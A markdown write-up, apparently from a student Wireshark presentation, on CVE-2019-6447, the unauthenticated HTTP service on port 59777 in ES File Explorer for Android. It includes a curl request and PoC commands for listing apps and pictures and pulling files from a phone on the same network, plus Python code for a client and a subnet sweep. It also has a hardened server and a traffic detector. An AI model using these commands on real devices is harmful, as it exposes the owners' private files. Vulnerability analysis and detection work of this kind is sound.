wireshark_presentation/ESVulnerability.md at master · sbleh/wireshark_presentation
@Kpate372 @sbleh @rajatbalhotra @laveshbansal

ES File Explorer Open Port Vulnerability (CVE-2019-6447)

If you use ES File Explorer on your Android phone, you were exposed to a serious vulnerability until recently. It has been fixed (update your app!), but users of the PRO version still appear to be affected. What was the problem? Let's have a look!

ES File Explorer

ES File Explorer is one of the most widely used third-party file management applications for Android. It can manage files, apps and cloud services, and it lets you access your phone's storage over Wi-Fi from another device. It has been downloaded over 100 million times and had a major security issue in versions up to and including 4.1.9.7.4.


CVE-2019-6447 Vulnerability

CVE-2019-6447 was published by the security researcher known as fs0c131y and carries a CVSS v3.0 base score of 8.1. An attacker on the same local network can read files from, or launch applications on, the victim's phone.

Every time a user launches ES File Explorer, a hidden HTTP server starts as well. The server listens on TCP port 59777 on all interfaces (note the `:::59777` wildcard address below), so it is reachable from any host on the same network, not just from the phone itself:

```
angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop
```

Furthermore, the server accepts JSON payloads from unauthenticated sources:

```
curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777
```

This lets an attacker read and exfiltrate confidential data from the victim's phone. The HTTP server is reachable by everybody on the local network, requires no authentication at all, and keeps running after the app has been closed.
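To make the flaw concrete, here is an added example written for this page; it is not ES File Explorer's code and not fs0c131y's PoC. It is a toy Python reproduction of the design: an HTTP listener that takes `{"command": ...}` JSON from anyone who can reach the port, placed next to a hardened variant that binds to loopback and demands a shared token, plus a client that sends the same request as the curl line above and a /24 sweep in the spirit of the PoC's `--network` option. The device info, file list, token value and all handler and function names are constructed for the example.

```python
"""Toy reproduction of the CVE-2019-6447 design flaw plus a client for it.

Constructed example: NOT ES File Explorer's code and NOT the public PoC.
The server mimics the shape of the bug (an HTTP listener bound to every
interface that accepts JSON {"command": ...} from anyone who can reach the
port) next to a hardened variant (loopback binding plus a shared token).
"""
import json
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib import error, request

ES_PORT = 59777

# Constructed sample data standing in for what the phone would return.
DEVICE_INFO = {"name": "angler", "ftpRoot": "/sdcard", "ftpPort": "3721"}
FILES = ["/sdcard/Download/images.jpg", "/sdcard/DCIM/Camera/IMG_0001.jpg"]


class CommandHandler(BaseHTTPRequestHandler):
    """Dispatches JSON commands. token is None in the vulnerable setup."""

    token = None

    def _reply(self, status, obj):
        body = json.dumps(obj).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        try:
            req = json.loads(self.rfile.read(length))
        except ValueError:
            return self._reply(400, {"error": "invalid JSON"})
        # Hardened variant: refuse commands that do not carry the app's token.
        if self.token is not None and req.get("token") != self.token:
            return self._reply(401, {"error": "unauthorized"})
        cmd = req.get("command")
        if cmd == "getDeviceInfo":
            return self._reply(200, DEVICE_INFO)
        if cmd == "listFiles":
            return self._reply(200, {"files": FILES})
        self._reply(400, {"error": "unknown command"})

    def log_message(self, *args):  # keep the example quiet
        pass


def make_server(bind_addr="0.0.0.0", port=ES_PORT, token=None):
    """Start the listener in a background thread and return it.

    bind_addr="0.0.0.0" with token=None reproduces the flaw. The hardened
    form is bind_addr="127.0.0.1" (or only the interface you mean to serve)
    together with a token, and .shutdown()/.server_close() when the app
    exits instead of leaving the port open.
    """
    handler = type("Handler", (CommandHandler,), {"token": token})
    srv = ThreadingHTTPServer((bind_addr, port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def send_command(host, port, command, token=None, timeout=2.0):
    """POST {"command": ...} like the curl line; returns (status, json body)."""
    payload = {"command": command}
    if token is not None:
        payload["token"] = token
    req = request.Request(
        f"http://{host}:{port}/",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    opener = request.build_opener(request.ProxyHandler({}))  # never via a proxy
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read())
    except error.HTTPError as e:
        return e.code, json.loads(e.read() or b"{}")
    except (error.URLError, OSError):
        return None, None  # closed port, refused connection or timeout


def find_listeners(prefix="192.168.0.", port=ES_PORT, timeout=0.5):
    """Sweep a /24 for hosts with the port open (the idea behind --network)."""
    def is_open(ip):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            return s.connect_ex((ip, port)) == 0
    hosts = [f"{prefix}{i}" for i in range(1, 255)]
    with ThreadPoolExecutor(max_workers=64) as pool:
        return [ip for ip, ok in zip(hosts, pool.map(is_open, hosts)) if ok]


if __name__ == "__main__":
    vuln = make_server("127.0.0.1", 0)  # port 0: pick a free port for the demo
    print(send_command("127.0.0.1", vuln.server_address[1], "getDeviceInfo"))
    vuln.shutdown()
    vuln.server_close()
```

The two server modes differ only in where they bind and whether a token is checked; that is the whole fix. A real app would additionally tear the listener down when it leaves the foreground rather than keeping it alive for as long as the process lives.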

What can be exploited?

  • Successful exploitation of this vulnerability can disclose sensitive information and allows the following actions:

    • List all the files in the sdcard in the victim device
    • List all the pictures in the victim device
    • List all the videos in the victim device
    • List all the audio files in the victim device
    • List all the apps installed in the victim device
    • List all the system apps installed in the victim device
    • List all the phone apps installed in the victim device
    • List all the apk files stored in the sdcard of the victim device
    • List all the apps installed in the victim device
    • Get device info of the victim device
    • Pull a file from the victim device
    • Launch an app of your choice
    • Get the icon of an app of your choice


CVE score of CVE-2019-6447

The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP. This gives a CVSS v3.0 base score of 8.1 (High).

Tutorial of the Exploit

The TCP port stays open once ES File Explorer has been launched on the victim's Android phone. This gives the attacker access to the victim's device: they can read device information, list installed applications, download pictures and perform every other action listed above.

The PoC script for this exploit is available on GitHub. Clone the repository from a terminal to get the PoC script. To run it, the attacker (connected to the same local network) needs a few Python packages installed; install them with:

```
pip install -r requirements.txt
```

After the packages are installed, the attacker can retrieve device information such as the device's local IP address and model:

```
python poc.py --cmd getDeviceInfo
```


The attacker can also list all applications installed on the victim's phone; the `--network` argument takes the local network prefix:

```
python poc.py --cmd listApps --network 192.168.0.
```


The attacker can list all pictures on the victim's phone and download any of them:

```
python poc.py --cmd listPics --network 192.168.0.
python poc.py -g /sdcard/Download/images.jpg --network 192.168.0.
```

The remaining commands are run the same way. To print the full list of available commands, use the following; for more details, see the GitHub repository mentioned above:

```
python poc.py list
```
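Because the exploit is plain HTTP on a fixed port, it is easy to spot on the wire, which matters for a Wireshark-centred write-up. The following is an added example, not part of the original page or of the PoC: it parses raw HTTP request payloads and flags POSTs that carry a JSON `command` to TCP 59777, tallying commands per source/destination pair. The sample packets (addresses, bodies, headers) are constructed to look like what the curl line and the PoC commands above send; they are not a real capture.

```python
"""Flag CVE-2019-6447 command requests in captured TCP payloads.

Constructed example: the parser and the sample capture below are written
for this page, not taken from the PoC or from a real pcap.
"""
import json
import re
from collections import Counter

ES_PORT = 59777
REQUEST_LINE = re.compile(rb"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]\r?\n")


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body).

    Returns None when the payload does not start with an HTTP request line.
    Header names are lower-cased; the body is returned as bytes.
    """
    m = REQUEST_LINE.match(raw)
    if not m:
        return None
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition(b"\n\n")
    headers = {}
    for line in head.split(b"\n")[1:]:
        key, _, value = line.strip().partition(b":")
        if key:
            headers[key.decode("latin-1").lower()] = value.strip().decode("latin-1")
    return m["method"].decode(), m["target"].decode(), headers, body


def es_command(raw, dst_port):
    """Return the command name if this looks like an ES File Explorer
    command request (JSON POST to 59777), otherwise None."""
    if dst_port != ES_PORT:
        return None
    parsed = parse_http_request(raw)
    if parsed is None:
        return None
    method, _, headers, body = parsed
    if method != "POST" or not headers.get("content-type", "").startswith("application/json"):
        return None
    try:
        cmd = json.loads(body).get("command")
    except (ValueError, AttributeError):  # not JSON, or JSON that is not an object
        return None
    return cmd if isinstance(cmd, str) else None


def summarize(packets):
    """packets: iterable of (src_ip, dst_ip, dst_port, payload bytes).
    Returns {(src_ip, dst_ip): Counter of commands} for flagged requests."""
    hits = {}
    for src, dst, dport, payload in packets:
        cmd = es_command(payload, dport)
        if cmd:
            hits.setdefault((src, dst), Counter())[cmd] += 1
    return hits


# Constructed capture: 192.168.0.20 probing a phone at 192.168.0.8.
SAMPLE_CAPTURE = [
    ("192.168.0.20", "192.168.0.8", 59777,
     b'POST / HTTP/1.1\r\nHost: 192.168.0.8:59777\r\nContent-Type: application/json\r\n'
     b'Content-Length: 27\r\n\r\n{"command":"getDeviceInfo"}'),
    ("192.168.0.20", "192.168.0.8", 59777,
     b'POST / HTTP/1.1\r\nHost: 192.168.0.8:59777\r\nContent-Type: application/json\r\n'
     b'Content-Length: 22\r\n\r\n{"command":"listPics"}'),
    ("192.168.0.20", "192.168.0.8", 59777,
     b'POST / HTTP/1.1\r\nHost: 192.168.0.8:59777\r\nContent-Type: application/json\r\n'
     b'Content-Length: 22\r\n\r\n{"command":"listApps"}'),
    # Same body to a web server on port 80: not the ES service, so ignored.
    ("192.168.0.21", "192.168.0.8", 80,
     b'POST / HTTP/1.1\r\nHost: 192.168.0.8\r\nContent-Type: application/json\r\n'
     b'Content-Length: 22\r\n\r\n{"command":"listPics"}'),
    # A bare GET on the ES port: someone touched the port, but sent no command.
    ("192.168.0.21", "192.168.0.8", 59777,
     b"GET / HTTP/1.1\r\nHost: 192.168.0.8:59777\r\n\r\n"),
]

if __name__ == "__main__":
    for (src, dst), cmds in summarize(SAMPLE_CAPTURE).items():
        print(f"{src} -> {dst}: {dict(cmds)}")
```

Feeding this real traffic means reassembling each TCP stream's client-to-server bytes first (Wireshark's "Follow TCP Stream" or a pcap library); the function works on that reassembled payload, not on individual segments.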


Comments and Conclusion

  • Another local vulnerability was found in ES File Explorer: a man-in-the-middle (MITM) issue.

  • Man-In-The-Middle: an attacker connected to the same local network can intercept the app's HTTP traffic and replace it with their own.

  • ES File Explorer was updated and the vulnerabilities were fixed.

  • The new version, ES File Explorer v4.1.9.9, is available online; the developers confirmed that it fixes the HTTP vulnerability in the LAN.

Was this on purpose?
  • Discussion on Twitter suggests that the ES File Explorer vulnerability was introduced intentionally.


Other application
  • ES File Explorer/Manager PRO also had the vulnerabilities and was not updated for a long time.